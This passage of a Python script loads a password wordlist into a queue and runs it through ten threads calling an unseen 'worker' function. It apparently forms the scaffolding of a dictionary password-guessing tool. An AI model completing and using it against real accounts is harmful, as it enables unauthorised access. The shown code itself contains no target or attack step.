    passwords = file.read().splitlines()

# Create a queue and add all the passwords to it
queue = Queue()
for password in passwords:
    queue.put(password)

# Number of threads
num_threads = 10

# Start the threads
threads = []
for i in range(num_threads):
    thread = threading.Thread(target=worker, args=(queue,))
    thread.start()
    threads.append(thread)

# Wait for all threads to finish
for thread in threads:
    thread.join()

print("Finished processing wordlist.")